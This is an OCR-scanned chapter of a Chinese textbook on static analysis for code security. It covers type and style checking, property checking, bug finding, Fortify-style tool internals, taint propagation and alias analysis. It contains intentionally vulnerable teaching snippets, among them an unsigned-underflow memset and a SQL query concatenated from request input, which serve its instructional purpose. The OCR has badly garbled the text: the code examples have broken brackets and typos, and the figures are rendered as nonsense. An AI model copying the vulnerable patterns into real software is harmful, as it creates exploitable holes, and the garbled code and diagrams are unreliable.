类 型 检查 是 最 普遍 的 静态 分 析 形 式 ， 也 是 大 多 数 程序 员 熟 悉 的 形式 ,但 很 多 程序 员 并 未 
给 予 足够 关注 ， 主 要 原因 是 类 型 的 规则 通常 都 是 由 编程 语言 定义 ， 并 由 编译 器 强制 执行 ， 程 
序 员 无 权 决定 什 么 时 候 执行 分 析 ， 或 者 分 析 如 何 运作 。 即 使 这 样 ， 类 型 检查 依旧 是 一 种 基本 
的 静态 分 析 ， 它 将 消除 代码 中 存在 的 类 型 错误 。 

类 型 检查 对 代码 中 错误 的 检测 能 力 是 有 局 限 的 ， 另 外 ， 与 其 他 所 有 静态 分 析 技 术 一 样 ， 
类 型 检查 也 存在 误 报 和 漏 报 的 问题 。 例 如 下 面 两 个 实例 分 别 为 误 报 和 漏 报 : 

例 1 

short s = 1; 
int i =s; 

short r =i; 

在 本 例 中 ， 程 序 的 本 意 是 想 要 将 一 个 类 型 为 int 的 表达 式 赋予 一 个 类 型 为 short 的 变量 ， 
但 是 却 无 法 通过 类 型 检查 。 可 以 通过 一 个 显 式 的 类 型 转换 来 解决 这 个 问题 。 

例 2 

String[] sa = new String[100]; 
sa[0] = "hello world"; 

Object[] oa = sa; 


oa[0] = new Integer(1); 
System.out.println(sa[0]); 


只 有 只 读 的 Object] 才能 是 Sting[] 的 父 类 型 。 但 Java 中 并 没有 具 读 数组 这 么 个 类 型， 
于 是 错误 发 生 了 。 
2. 风格 检查 


风格 检查 也 是 静态 分 析 工 具 的 一 种 。 由 于 许多 程序 员 认为 的 好 风格 都 具有 强烈 的 个 人 色 
彩 ， 因 此 大 多 数 风格 检查 程序 在 其 所 执行 的 规则 集中 都 十 分 灵活 。 由 风格 检查 程序 所 显示 的 
错误 常 只 是 影响 代码 的 可 读 性 和 可 维护 性 ， 而 不 是 程序 运行 过 程 中 会 发 生 的 某 种 错误 。 随 着 
时 间 的 推进 ， 很 多 编译 器 也 已 经 实现 了 可 选 的 风格 检查 功能 。 

在 一 个 大 型 编程 项 目的 中 途 很 难 采用 一 个 风格 的 检查 工具 ， 因 为 对 于 “正确 ”的 风格 ， 
不 同 程序 员 很 可 能 已 经 形成 了 自己 不 同 的 看 法 。 在 项 目 启动 后 ， 仅 为 减少 风格 检查 时 的 输出 
而 重新 检查 一 遍 程 序 以 调整 代码 风格 ， 这 不 会 实现 多 少 实际 利益 。 因 此 ， 在 项 目的 开始 采用 
风格 检查 是 最 容易 的 。 

目前 ， 有 许多 开源 的 和 商业 的 风格 检查 程序 可 供 使 用 。 其 中 ， 迄 今 为 止 最 著名 也 是 最 古 
老 的 工具 是 Lint。 原 来 许多 由 Lint 所 执行 的 检查 ， 现 在 已 经 并 入 到 当前 流行 的 编译 器 所 提供 
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的 各 种 警告 级 别 中 , 但 是 “类 Lint ”这 个 词 则 成 了 用 于 描述 风格 检查 程序 的 歧视 性 术语 。Java 
风格 检查 通常 使 用 开源 PMD, 因为 该 程序 可 以 很 容易 地 选择 你 想 要 遵循 的 风格 规则 , 并 且 添 
加 自 定义 规则 也 同样 简单 。 下 面 是 PMD 的 风格 检查 代码 示例 : 
import java.util.*; 
public class Test ( 
public static void main(String[] args) ( 
tryt 
if(true) () 
System.out.println("Hello World!"); 
) catch(Exception e) ( 
} 
} 
y 


PMD 会 检查 出 : catch 块 中 没有 内 容 、 让 判断 块 中 没有 内 容 、 代 码 中 出 现 System.out println 
3. 程序 理解 


程序 理解 最 主要 的 用 途 在 于 帮助 理解 程序 ， 搞 懂 代码 库 中 的 大 量 代 码 。 它 是 一 个 从 计算 
机 程序 中 获取 知识 信息 的 过 程 ， 这 些 知识 信息 可 以 用 于 程序 排 错 、 增 强 程序 、 重 用 程序 和 整 
理 文档 等 工作 。 在 很 多 集成 开发 环境 GDE) 中 ， 都 包括 了 一 些 初级 的 程序 理解 功能 ， 比 如 : fr 
找 本 变量 的 声明 和 使 用 位 置 。 更 高 级 一 点 的 还 能 帮助 查找 类 之 间 的 关联 关系 等 。 

4. 程序 验证 和 属性 检查 


程序 验证 是 对 源 代码 进行 分 析 ， 如 果 源 代码 符合 预先 专门 制定 的 一 份 描述 程序 行为 的 规 
格 说 明 ， 那 么 说 明 该 程序 完好 。 

这 里 存在 的 最 大 的 问题 就 是 ， 程 序 验证 依靠 的 是 预先 制定 的 规格 说 明 ， 而 要 想 程序 验证 
的 结果 有 足够 的 说 服 力 ， 这 份 规格 说 明 务 必需 要 完整 而 详细 。 但 是 通常 没有 办 法 达到 这 种 程 
度 。 因 为 为 了 编写 达到 这 种 程度 规格 说 明 书 ， 可 能 需要 花费 比 编 这 个 程序 更 多 的 时 间 。 作 为 
替代 的 方法 , 更 多 的 是 使 用 属性 检查 。 属 性 检查 的 方法 跟 程序 验证 的 方法 从 本 质 上 是 一 样 的 ， 
它们 的 区 别 在 于 ， 属 性 检查 依据 的 只 是 描述 部 分 程序 行为 的 部 分 规格 说 明 ， 而 程序 验证 依据 
的 是 描述 所 有 程序 行为 的 规格 说 明 。 大 多 数 的 属性 检查 工具 都 将 检查 的 重点 放 在 临时 性 安全 
属性 上 ， 临 时 性 安全 属性 规定 了 一 系列 在 系统 中 不 能 发 生 的 有 序 的 事件 。 大 多 数 的 属性 检查 
工具 都 支持 自己 定义 的 临时 性 安全 属性 ， 如 下 例 ， 用 无 符号 整数 识别 负数 : 

BOOL fun(size t cbSize) 

{ 

if(cbSize > 1024) 

rerurn FALSE; 

char *pBuf = new char[cbSize - 1]; 

// 未 对 new 的 返回 值 进行 检查 

memset(pBuf, 0x90, cbSize - 1); 


return TRUE; 
} 
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在 上 面 代 码 中 ， 在 调用 new 分 配 内 存 后 ， 程 序 未 对 调用 结果 的 正确 性 进行 检测 。 如 果 

cbSize 为 0 的 话 ， 则 (cbSize - 1) 为 -1。 但 是 Memset 中 第 3 个 参数 本 身 是 无 符号 数 ， 因 此 会 将 
-1 视 为 正 的 0xffffffff， 函 数 执行 之 后 程序 当然 就 只 有 骨 溃 了 。 
由 于 属性 检查 依靠 事先 制定 的 规则 ， 因 此 事先 制定 的 规则 越 多 ， 属 性 检查 越 “健全 ”。 大 
部 分 时 候 会 在 追求 健全 性 和 复杂 度 之 间 取 一 个 平衡 ， 因 为 规则 制定 的 越 健全 ， 属 性 检查 越 复 
杂 ， 越 有 可 能 出 现 误 报 。 需 要 注意 的 是 ， 属 性 检查 不 会 出 现 漏 报 ， 这 是 因为 只 要 制定 了 相应 
规则 ， 属 性 检查 就 会 报告 相应 错误 ， 而 不 制定 ， 则 不 报告 。 

5. Bug 查找 


Bug 查找 是 指 按照 预先 制定 的 一 些 共 同 认同 的 规则 ， 来 查找 程序 中 存在 的 一 些 bug. iX 
些 所 谓 的 “ 坏 代码 "也 许 是 效率 问题 (例如 创建 不 必要 的 对 象 )， 也 有 可 能 是 安全 性 或 稳定 性 方 
面 的 隐患 (例如 不 恰当 的 同步 、 未 关闭 的 文件 句柄 )。 如 在 下 面 的 例子 中 ， 在 构造 函数 中 读 取 
未 初始 化 的 字段 : 

public class Thing ( 

private List actions; 

public Thing(String startingActions) ( 

StringTokenizer tokenizer - new 

StringTokenizer (startingActions); 

while (tokenizer.hasMoreTokens()) ( 

actions.add(tokenizer.nextToken()); 
) 


) 
) 


最 后 一 行将 产生 一 个 null 指针 异常 ， 因 为 变量 actions 还 没有 初始 化 。 
我 们 再 来 看 另外 一 个 例子 : NULL 指针 

Person person = aMap.get ("bob"); 

if (person != null) { 

person.updateAccessTime(); 


) 
String name = person.getName(); 


如 果 第 1 行 的 Map 不 包括 一 个 名 为 “bob” 的 人 ， 那 么 在 第 5 行 询问 person. 的 名 字 时 
就 会 出 现 null. 指针 异常 。 


6. 安全 审查 


以 安全 为 中 心 的 静态 分 析 工 具 使 用 了 许多 在 其 他 工具 中 使 用 的 技术 ， 但 对 于 其 目标 的 关 
注意 味 着 会 以 不 同 的 方式 来 应 用 这 些 技术 。 

最 早 的 安全 工具 非常 贴近 于 风格 检查 工具 ， 它 们 所 指出 的 问题 不 一 定 能 引起 安全 问题 ， 
但 是 ， 它 们 表示 了 一 种 日 益 提高 安全 关注 的 思考 ， 这 些 工 具 一 次 次 地 因为 较 高 的 误 报 率 而 被 
指控 ， 这 是 因为 人 们 试 着 将 这 些 工 具 的 输出 作为 一 份 Bug 列表 来 看 待 ， 而 不 是 将 其 作为 代码 
审查 期 间 的 一 种 辅助 手段 来 使 用 。 


an 必 mw 
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现代 安全 分 析 工 具 往 往 更 像 是 一 种 属性 检查 程序 和 Bug 查找 程序 的 混合 体 , 许多 安全 属 
性 能 被 简洁 地 表达 为 程序 属性 ， 对 于 一 个 属性 检查 程序 来 说 ， 搜 索 潜在 的 缓冲 区 溢出 漏洞 可 
以 当成 是 检查 这 样 的 程序 属性 :“ 程 序 不 会 访问 被 分 配 内 存 的 边界 之 外 的 地 址 ” 从 Bug 查找 
领域 ， 安 全 分 析 工 具 采 纳 了 这 样 一 种 观念 ， 即 开发 人 员 往 往 会 继续 再 使 用 相同 的 不 安全 的 方 
法 来 解决 问题 ， 这 可 说 成 是 一 种 不 安全 的 惯例 。 关 于 代码 审查 的 具体 技术 和 流程 . 我 们 将 在 
43 节 中 详细 讨论 。 


44.3 ”代码 安全 静态 分 析 工 具 的 引入 


对 入 行 不 久 的 程序 员 来 说 ， 对 安全 编程 所 需 的 知识 缺乏 理解 会 导致 其 所 编写 的 代码 不 符 
合 安全 规范 而 引发 安全 问题 。 另 外 ， 即 使 是 经 验 丰富 的 程序 员 也 无 法 完全 避免 在 代码 编写 的 
过 程 中 出 现 或 多 或 少 的 拼写 错误 ， 这 类 简单 错误 有 时 也 可 能 引发 安全 问题 。 程 序 员 完全 不 知 
道 攻击 者 会 以 怎样 的 方式 来 尝试 利用 某 段 代 码 ， 因 此 即使 是 最 细微 的 错误 也 可 能 是 相当 重大 
的 安全 隐患 。 树 立 了 这 种 认识 ， 我 们 就 意识 到 程序 静态 分 析 的 重要 性 ， 从 而 通过 进一步 学 习 
感受 其 相当 强大 的 安全 问题 识别 能 力 。 

静态 分 析 工 具 能 够 完整 而 客观 地 进行 程序 检测 ， 而 不 管 编码 人 员 是 否 了 解 哪些 代码 是 与 
安全 “相关 的 ” 与 采用 人 工 校对 的 方式 相 比 ， 这 种 静态 分 析 方 法 显得 更 加 可 靠 和 中 立 。 

静态 分 析 可 在 开发 早期 发 现 错误 ， 甚 至 是 程序 第 一 次 运行 之 前 就 可 以 发 现 ， 这 不 但 降低 
了 修补 漏洞 的 花 销 ， 而 且 这 种 迅速 反馈 机 制 也 有 助 于 指导 程序 员 的 工作 。 程 序 员 也 有 机 会 修 
改 他 们 之 前 没有 注意 到 但 却 很 可 能 发 生 的 错误 。 静 态 分 析 工 具 所 使 用 的 攻击 方法 与 代码 构建 
相关 的 信息 充当 了 知识 转移 的 手段 。 

当 一 种 新 的 攻击 出 现时 ， 静 态 分 析 工 具 可 以 迅速 地 对 相关 代码 进行 复查 ， 同 时 分 析 该 新 
型 攻击 能 否 对 代码 构成 威胁 。 在 被 发 现 之 前 ， 某 些 安全 缺陷 已 在 程序 中 存在 很 和 人 了， 静态 分 
析 工 具有 能 力 针对 新 发 现 的 缺陷 类 型 对 遗留 代码 进行 检查 。 

从 上 面 的 叙述 中 我 们 可 以 更 清楚 地 看 到 程序 静态 分 析 的 安全 问题 识别 能 力 ， 但 事实 证 
明 ， 程 序 静态 分 析 方 法 并 非 十 全 十 美 ， 它 在 代码 安全 问题 检测 的 大 框架 下 仍然 有 自己 的 局 限 
性 。 其 中 最 普遍 的 局 限 性 就 是 : 由 于 代码 静态 分 析 是 通过 对 程序 扫描 找到 匹配 某 种 规则 模式 
的 程序 代码 以 发 现 其 中 存在 的 问题 ， 这 样 有 时 会 出 现 将 某 些 正确 代码 错 判 为 缺陷 的 问题 ， 因 
此 在 对 代码 检查 的 过 程 中 会 产生 太 多 无 用 信息 ， 尤 其 是 产生 太 多 误 报 。 过 多 的 误 报 会 带 来 很 
多 困难 。 过 多 的 误 报信 息 不 仅 会 增加 测试 人 员 和 程序 员 的 劳动 力 ， 而 且 ， 查 看 见长 的 误 报 列 
表 还 可 能 遗漏 掉 隐藏 在 列表 中 的 真实 漏洞 信息 。 

尽管 误 报 难以 避免 ， 但 从 安全 的 角度 看 ， 漏 报 才 是 最 严重 的 局 限 性 。 漏 报 是 指 程序 中 存 
在 缺陷 ， 但 安全 分 析 工 具 却 没有 检测 出 该 缺陷 。 误 报 的 代价 是 对 分 析 报 告 的 审查 会 花费 更 多 
时 间 ， 但 漏 报 的 代价 却 更 为 严重 。 不 仅 要 为 与 代码 中 存在 漏洞 相关 的 后 果 负 责 ， 而 且 程序 会 
一 直 存在 于 安全 的 假象 中 ， 这 种 假象 源 于 分 析 工具 表象 的 检查 结果 。 

大 多 数 静态 分 析 工具 都 会 产生 一 些 误 报 或 者 漏 报 的 情况 ， 而 一 个 静态 分 析 工 具 在 误 报 和 
漏 报 之 间 进 行 平 衡 的 侧重 不 同 ， 往 往 预示 着 其 用 途 的 不 同 。 用 于 检测 程序 中 普通 Bug 的 静态 
分 析 工 具 和 专用 于 检测 安全 缺陷 的 静态 分 析 工 具 相 比 ， 前 者 通常 会 力求 产生 少量 的 误 报 而 更 
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愿意 接收 漏 报 的 情况 ， 而 后 者 在 漏 报时 付出 的 代价 可 能 会 很 高 ， 所 以 它 通常 会 产生 更 多 的 误 
报 而 尽量 减少 漏 报 的 情况 。 

综 上 所 述 ， 引 入 代码 静态 分 析 工 具 的 目的 就 是 提高 代码 分 析 的 客观 性 ， 提 高 分 析 效 率 与 
准确 性 ， 增 强 代 码 分 析 的 全 面 性 。HP Fortify SCA 是 一 款 静 态 的 、 白 盒 的 软件 源 代码 安 全 测 
试 工具 。 它 通过 内 署 的 五 大 主要 分 析 引 擎 : 数据 流 、 语 义 、 结 构 、 控 制 流 、 配 置 流 等 对 应 | 
软件 的 源 代码 进行 静态 的 分 析 ， 分 析 的 过 程 中 与 它 特有 的 软件 安全 漏洞 规则 集 进行 全 面 的 匹 
配 、 查 找 ， 从 而 将 源 代码 中 存在 的 安全 漏洞 扫描 出 来 ， 并 给 予 整 理 报告 。 扫 描 的 结果 中 不 但 
包括 详细 的 安全 漏洞 的 信息 ， 还 会 有 相关 的 安全 知识 的 说 明 ， 以 及 修复 意见 的 提供 。 


42 BG BE 


图 4-1 显示 了 静态 分 析 安 全 工具 的 原理 框图 。 


源 代码 -一 >|[ 建 模 厂 >| 执行 分 析 |] 提供 结果 


图 4-1 静态 分 析 安 全 工具 原理 框图 


从 图 4-1 可 以 看 出 ， 一 个 代码 安全 静态 分 析 工 具 的 工作 流程 是 : 

1. 提取 源 代码 ; 

2. 根据 分 析 需 求 把 程序 源 代码 变换 成 易于 分 析 处 理 的 程序 模型 .在 这 个 过 程 用 到 了 编译 
原理 中 的 成 熟 技术 ; 

3. 将 代码 按照 检查 规则 执行 分 析 ; 

4. 按照 制定 的 报告 模式 生成 分 析 报 告 。 

接 下 来 我 们 就 详细 讨论 上 述 几 步 中 涉及 的 理论 和 技术 。 
42. 建 模 


静态 分 析 工 具 首先 要 做 的 ， 是 用 一 个 程序 模型 来 表示 竺 分析 的 代码 ， 即 提取 目标 代码 的 
数据 结构 。 该 程序 模型 与 所 选择 执行 的 分 析 类 型 密切 相关 ， 在 构建 该 模型 的 过 程 中 ， 静 态 分 
析 工 具 一 般 会 借用 大 量 来 自 编译 器 领域 的 技术 ， 其 中 最 重要 的 技术 如 下 所 述 。 

1. 词法 分 析 

词法 分 析 是 编译 器 实现 的 第 一 步 。 它 的 任务 是 把 源 文件 的 字符 流转 换 成 记号 流 ， 即 从 左 
到 右 逐 个 字符 对 构成 源 程序 的 字符 串 进 行 扫描 ， 依 据 词法 规则 ， 识 别 出 一 个 一 个 的 标记 
(token), 把 源 程序 变 为 等 价 的 标记 串 序列 。 例如 : inta= 3 + 5: 经 过 词法 分 析 会 输出 inta 7.3.5 
和 :这 七 个 单词 。 然 后 比较 记号 流 中 的 标识 符 和 预先 定义 的 安全 性 漏洞 字典 ， 如 果 匹 配 就 发 出 
警告 。 例 如 : 一 旦 发 现 C 源 程序 中 存在 stcpy、strcat 等 字符 串 操作 函数 ， 即 认为 存在 缓冲 区 
溢出 这 种 安全 性 漏洞 ， 因 为 这 些 函 数 可 能 引起 缓冲 区 溢出 ， 此 时 的 安全 性 漏洞 字典 包含 


I 
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strcpy. streat 等 。 
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在 静态 分 析 工 具 中 ， 词 法 分 析 是 针对 源 代 码 进行 的 第 一 个 操作 ， 该 操作 将 代码 转换 为 一 
系列 记号 , 这 个 记号 流 的 创建 过 程 称 为 词法 分 析 (程序 文本 中 空白 或 注释 等 不 重要 的 部 分 将 直 
接 跳 过 )。 词 法 规则 通常 采用 正则 表达 式 来 识别 记号 。 


2. 语法 解析 


语法 解析 器 中 上 


来 匹配 上 述 记 号 流 的 是 一 种 与 上 下 文 环境 无 关 的 语法 。 该 语法 由 一 组 产 


生 式 构成 ， 用 语言 中 的 一 对 符号 来 标记 。 解 析 器 通过 将 构成 语法 的 产生 式 规 则 与 上 述 记 号 流 
进行 匹配 而 执行 一 种 派生 。 如 果 每 个 符号 都 与 派生 出 此 符号 的 那个 符号 相连 接 ， 那 么 一 棵 解 
析 树 就 形成 了 。 下 面 是 一 个 解析 记号 流 规程 的 实例 : 


stmt :-if stmt|assign stmt 
if stmt := IF LPAREN expr RPAREN stmt 


expr :- lval 


assign stmt :- lval EQUAL expr SEMI 
lval = ID | arr access 

arr access := ID arr index* 

arr idx :- LBRACKET expr RBRACKET 


图 4-2 是 根据 上 例 做 出 的 解析 树 : 


stmt 
l 
if_stmt 
expr boss 
4 | 
lval assign stmt 
4 "d 
ID(ret) a 
lval “和 
i 
arr access lval 
ID (mat) arr idx arr idx ID(END VAL) 
i 0 
expr expr 
4 
lval lval 
i i 
ID(x) ID(y) 
图 4-2 解析 树 


3. 抽象 语法 树 


通过 解析 树 可 以 完成 很 多 重要 类 型 的 检查 和 分 析 ， 因 为 解析 树 是 包含 程序 员 初始 想法 的 


代码 的 最 直接 代表 。 


但 是 解析 树 无 法 完成 复杂 的 分 析 ， 因 为 在 解析 工程 中 ， 经 常会 对 语法 进 
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行 等 价 的 转换 ， 这 样 会 给 语法 引入 一 些 多 余 的 成 分 ， 对 后 续 阶 段 造成 不 利 影 响 ， 甚 至 会 使 各 
阶段 变 得 混乱 。 因 此 ， 很 多 编译 器 (包括 GJC) 经 常 要 独立 地 构造 解析 树 ， 为 前 、 后 端 建立 一 
个 清晰 的 接口 。 这 时 就 需要 使 用 抽象 语法 树 (AST)。 

抽象 语法 树 的 结构 不 依赖 于 源 文件 的 文法 ， 也 就 是 解析 阶段 所 采用 的 上 下 文 无 关 语法 ， 
因此 它 能 够 为 后 来 的 分 析 提 供 一 个 更 加 标准 方便 的 版 本 。 上 例 中 的 抽象 语法 树 如 图 4-3 rn: 


if_stmt 


| 


NOT assign stmt NO OP 


J 
GENES P di bw 


ID(ret) 0 qe TOENG CVAD) 


arr_idx ID(y) 


a TR 
ID (mat) ID(x) 


图 4-3 抽象 语法 树 

4. 语义 分 析 

源 程序 如 果 通 过 了 词法 分 析 和 解析 ， 就 表明 该 源 程序 书写 正确 、 符 合 程序 语言 所 规定 的 
语法 。 但 语法 分 析 并 未 对 程序 内 部 的 逻辑 含义 加 以 分 析 ， 因 此 接着 进行 语义 分 析 。 

语义 分 析 ， 即 审查 每 个 语法 成 分 的 静态 语义 。 如 果 静 态 语义 正确 ， 则 生成 与 该 语言 成 分 
等 效 的 中 间 代 码 ， 或 直接 生成 目标 代码 。 静 态 语义 检查 涉及 以 下 几 个 方面 : 

1) 类 型 检查 ， 如 运算 操作 数 的 类 型 应 相 容 。 

2) 控制 流 检 查 ， 用 以 保证 控制 语句 有 合法 的 转向 点 。 如 C 语言 中 不 允许 goto 语句 转 入 
case 语句 流 ; break 语句 需要 寻找 包含 它 的 最 小 switch. while 或 for 语句 方 可 找到 转向 点 。 

3) 一 致 性 检查 ， 如 在 相同 作用 域 中 标识 符 只 能 说 明 一 次 、case 语句 的 标号 不 能 相同 等 。 

需要 指明 的 是 ， 基 于 语法 和 简单 语义 分 析 的 安全 性 检查 的 工作 原理 非常 类 似 于 编译 器 系 
统 ， 它 以 语法 分 析 和 语义 规则 为 基础 ， 同 时 加 入 简单 的 控制 流 分 析 和 数据 流 分 析 。 因 此 这 种 
方法 具有 较 高 的 分 析 效率 和 可 扩展 性 ， 并 且 可 以 通过 向 程序 中 加 入 面向 对 象 程序 切片 中 的 数 
据 流 分 析 注 释 信 息 的 方式 发 现 软件 中 广泛 存在 的 安全 性 漏洞 ， 如 程序 中 出 现 几率 最 多 的 内 存 
访问 漏洞 ， 包 括 存 储 区 的 非法 使 用 、 空 指针 的 引用 、 缓 冲 区 溢出 等 。 它 的 男 一 个 优点 是 可 适 
用 于 对 大 规模 程序 的 分 析 。 

5. 跟踪 控制 流 


许多 静态 分 析 算 法 都 会 探究 函数 执行 可 能 采取 的 路 径 。 因 此 ， 绝 大 多 数 分 析 工 具 都 会 在 
AST 或 者 中 间 表 示 法 之 上 生成 一 个 控制 流 图 以 使 算法 更 高 效 。 控制 流 图 中 的 节点 是 一 些 基本 
块 : 指令 序列 总 以 连续 方式 从 第 一 条 执行 到 最 后 一 条 。 另 外 ， 其 边界 执行 代表 者 基本 块 之 间 
隐 合 的 控制 流 路 径 ， 返 回 边界 代表 着 隐 含 的 循环 。 

程序 运行 时 的 控制 流 可 用 其 执行 的 一 系列 基本 块 来 描述 。 控 制 流 的 轨迹 是 一 个 基本 块 组 
成 的 序列 ， 这 个 序列 就 是 一 条 完整 的 代码 执行 路 径 。 图 4-4 是 一 个 控制 流程 图 的 实例 : 
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图 4-4 控制 流程 图 


调用 图 描述 了 函数 或 者 方法 之 问 潜在 的 控制 流 。 如 果 缺 少 函数 指针 或 者 虚 函数 ， 我 们 仅 
是 通过 查找 每 个 函数 中 引用 的 函数 指针 来 构建 调用 图 。 在 构建 好 的 调用 图 中 , 节点 表示 函数 ， 
有 向 边缘 表示 隐 含 的 调用 。 

在 函数 指针 或 者 虐 函 数 被 调用 时 ， 分 析 工 具 会 将 数据 流 分 析 和 数据 类 型 分 析 组 合 使 用 来 
限制 从 某 个 调用 点 上 可 能 引用 的 函数 集合 。 在 运行 时 动态 裁 入 代码 模块 的 情况 下 ， 因 为 那些 
在 分 析 时 不 可 见 的 代码 可 能 会 被 程序 运行 ， 所 以 此 时 没有 能 确保 控制 流 图 完整 无 缺 的 方法 。 

对 于 交叉 使 用 多 种 编程 语言 的 软件 系统 ， 或 者 由 多 个 相互 协作 的 程序 构成 的 软件 系统 ， 
更 态 分 析 工具 将 完美 地 颖 合 出 一 张 表示 各 部 分 之 问 连接 的 控制 流 图 。 对 于 某 些 系统 来 说 ， 配 
置 文件 中 保存 着 调用 图 在 不 同 环境 中 所 需 的 数据 。 

6. 跟踪 数据 流 


检查 数据 在 程序 中 的 移动 的 路 径 通 常 采 用 数据 流 分 析 算 法 。 编 译 器 执行 数据 流 分 析 ， 从 
而 定位 寄存 器 、 移 除 无 用 代码 、 并 执行 许多 其 他 的 优化 。 

数据 流 分 析 一 般 是 对 某 个 函数 的 控制 流 图 进行 遍历 ， 同 时 记录 数据 值 的 产生 和 使 用 位 
置 。 将 函数 变换 为 静态 单一 赋值 (SSA，Static Single Assignment) 形 式 ， 这 对 许多 数据 流 问 题 来 
说 都 是 有 益 的 。SSA 形式 的 函数 只 允许 对 每 个 变量 进行 一 次 赋值 。 为 适应 这 种 约束 ， 就 必须 
将 新 变量 引入 到 程序 中 。 

如 果 某 个 变量 分 别 沿 着 不 同 控制 流 图 被 赋予 了 不 同 的 值 , 那么 在 SSA 形式 中 , 这 个 变量 
必须 在 控制 流 路 径 融 合 的 那个 位 置 进行 合并 处 理 。SSA 引入 一 个 新 型 变量 并 将 来 自 两 条 控制 
流 路 径 之 一 的 值 赋 给 这 个 新 型 变量 ， 通过 这 种 方法 来 完成 上 述 融 合 。 用 于 融合 点 的 这 种 简化 
符号 称 为 一 个 yw- 函数 。 

7. 污染 传播 

通过 污染 传播 测试 能 知道 攻击 者 可 能 潜在 地 控制 程序 中 的 哪些 值 ， 确 定 污染 数据 的 来 
源 ， 找 出 所 有 外 部 数据 进入 程序 的 入 口 代码 以 及 它 在 程序 中 是 如 何 移动 的 。 污 染 传播 是 大 多 
数 输入 验证 和 其 他 代表 性 缺陷 产生 的 关键 。 例 如 ， 包 含 了 一 个 可 被 利用 的 缓冲 区 溢出 漏洞 的 
程序 几乎 都 有 一 个 从 输入 函数 到 一 个 脆弱 操作 的 数据 流 路 径 。 下 面 的 例子 中 ， 代 码 动态 构建 
和 执行 一 个 SQL 查询 ， 查 找 与 给 定名 称 匹 配 的 item。 查 询 限 定 只 有 当当 前 用 户 名 与 item 的 
所 有 者 名 称 匹配 时 ， 才 向 当前 用 户 显示 item: 
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String userName = tx.getAuthenticatedUserName () ; 

String itemName = request.getParameter ("itemName"); 

String query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname 
" + itemName + "'" 

ResultSet rs - stmt.execute (query); 


8. 指针 别名 歧义 


指针 别名 分 析 是 另 一 个 数据 流 问 题 。 别 名 分 析 的 目的 是 要 了 解 哪些 指针 可 能 是 指向 相同 
的 内 存 位置 。 别 名 分 析 算 法 用 诸如 “必需 的 别名 六 “可 能 的 别名 ”和 “不 能 的 别名 ”来 描述 
指针 的 关系 。 许 多 编译 器 优化 都 需要 某 种 形式 的 别名 分 析 的 正确 性 。 

例如 ， 只 有 当 指 针 pl 和 p2 不 指向 内 存 的 相同 位 置 时 ， 编 译 器 才 会 记录 下 面 两 个 声明 : 

*pl = 1; 

*p2 = 2; 

对 于 安全 工具 来 说 ， 别 名 分 析 在 执行 污染 传播 测试 方面 很 重要 。 一 个 流动 的 敏感 的 污点 
-跟踪 算法 需要 执行 别名 分 析 ， 以 了 解 下 面 代码 中 从 getUserInputO 到 processInput0 的 数据 流 : 

pl = p2; 


*pl = getUserInput (); 
processInput (*p2); 


422 分析 算法 


使 用 静态 分 析 算 法 的 目的 是 要 提高 上 下 文 的 敏感 性 (以 确定 一 段 特 殊 代码 运行 的 环境 和 
条 件 )， 同 时 更 好 的 上 下 文敏 感性 ， 能 够 更 好 地 评估 代码 的 危险 性 。 

任何 优秀 的 分 析 策 略 都 至 少 包括 两 个 组 成 部 分 : 分 析 每 个 单独 的 函数 的 程序 内 分 析 ( 本 地 
分 析 ) 和 分 析 函 数 之 间 的 关系 的 程序 间 分 析 ( 全 局 分 析 )。 图 4-5. 显示 了 这 两 个 分 析 的 结构 组 成 
以 及 每 个 分 析 中 使 用 的 数据 的 关系 。 


分 析 算 法 
本 地 分 析 
MSN 全 局 分 析 
CAS |I 3 
控制 流 图 表 babes 
图 4-5 分 析 算法 


1. 断言 检查 
Floyd 提出 的 “用 断言 式 方法 ”证 明 程 序 的 正确 性 的 方法 .是 通过 一 个 断言 发 现 工具 从 程 
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序 中 发 现 该 程序 断言 ， 然 后 与 程序 要 求 满足 的 断言 条 件 比较 ， 从 而 判断 其 正确 性 。 该 工具 在 
复杂 条 件 下 对 程序 正确 性 判断 和 大 量 重复 程序 检测 上 能 发 挥 重要 的 作用 。 

断言 可 用 来 描述 许多 安全 属性 ， 而 且 ， 这 些 断言 对 要 保护 的 程序 来 说 必须 是 真实 的 。 

如 果 程 序 的 迎 辑 保证 这 个 断言 总 是 有 效 的 ， 就 不 可 能 发 生 缓冲 区 溢出 。 如 果 存 在 一 组 条 
件 , 在 这 些 条 件 下 这 个 断言 可 能 失效 , 那么 分 析 程 序 就 应 该 报告 一 个 潜在 的 缓冲 区 溢出 错误 。 
利用 这 种 断言 的 方法 同样 能 很 好 地 进行 需求 定义 ,这 些 需 求 可 用 于 避免 出 现 SQL 注入 、 中 站 
点 执行 脚本 等 。 

通常 有 以 下 3 种 从 安全 特性 产生 的 断言 ; 

1) 大 部 分 安全 问题 都 由 程序 员 引起 ， 他 们 在 不 该 信 任 的 时 候 信任 了 输入 ， 因 此 ， 分 析 工 
具 应 该 队 查 那些 与 在 程序 中 传送 时 数据 被 赋予 的 信任 等 级 相关 的 断言。 这 些 都 属于 污染 传播 
问题 。SQL 注入 和 跨 站 点 执行 脚本 是 两 种 漏洞 类 型 ， 它 们 将 使 分 析 工 具 构造 有 关 污 染 传播 的 
断言 。 在 最 简单 的 情景 中 ， 数 据 的 值 或 者 被 污染 了 或 者 没有 被 污染 。 另 一 种 情况 是 ， 仅 一 自 
数据 就 可 能 携带 了 一 个 或 多 个 特定 类 型 的 污染 。 

2) 查找 可 利用 的 缓冲 区 溢出 漏洞 所 引发 的 断言 与 源 自 污染 传播 的 断言 相似 ,但 判断 一 个 
缓冲 区 是 否 发 生 溢出 ， 它 要 求 跟踪 的 远 不 止 是 否 涉及 污染 的 数据 ， 分 析 工具 还 需要 知道 这 个 
缓冲 区 的 大 小 以 及 用 作 索 引 的 那个 值 。 由 于 它 要 求知 道 一 个 变量 可 能 有 的 潜在 值 的 范围 ， 所 
以 也 将 这 些 分 析 称 为 范围 分 析 问题 。 

3) 某 些 情况 下 , 工具 不 太 关心 具体 的 数据 值 ,而 更 多 关心 某 个 对 象 在 程序 运行 时 的 状态 。 
这 称 为 是 类 型 状态 一 在 代码 中 的 每 个 位 置 ， 变 量 都 可 以 有 不 同 的 类 型 。 

2. 本 地 分 析 方 法 


这 部 分 的 分 析 主 要 针对 于 分 支 和 循环 ， 所 以 要 求 静态 分 析 方 法 不 必 那 么 精确 ， 但 是 一 定 
要 可 靠 。 本 地 分 析 包 括 以 下 几 个 方面 : 

